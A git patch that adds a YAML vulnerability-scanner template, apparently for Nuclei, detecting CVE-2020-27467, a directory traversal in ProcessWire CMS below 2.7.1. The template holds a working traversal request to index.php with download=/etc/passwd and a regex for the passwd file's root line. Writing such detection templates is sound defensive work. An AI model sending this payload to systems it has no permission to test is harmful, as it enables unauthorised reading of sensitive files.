From 9d355bc12a774bec8f7ddd02d72ff3817a6a4d4e Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 21 Mar 2022 18:23:59 +0900 Subject: [PATCH] Create CVE-2020-27467.yaml --- CVE-2020-27467.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 CVE-2020-27467.yaml diff --git a/CVE-2020-27467.yaml b/CVE-2020-27467.yaml new file mode 100644 index 0000000000..24be20b933 --- /dev/null +++ b/CVE-2020-27467.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-27467 +info: + name: Processwire CMS < 2.7.1 - Directory Traversal + author: 0x_Akoko + severity: high + description: Local File Inclusion in Processwire CMS < 2.7.1 allows to retrieve arbitrary files via the download parameter to index.php By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system. + reference: + - https://github.com/Y1LD1R1M-1337/LFI-ProcessWire + - https://www.cvedetails.com/cve/CVE-2020-27467 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-27467 + cwe-id: CWE-22 + tags: cve,cve2020,processwire,lfi,cms + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?download=/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200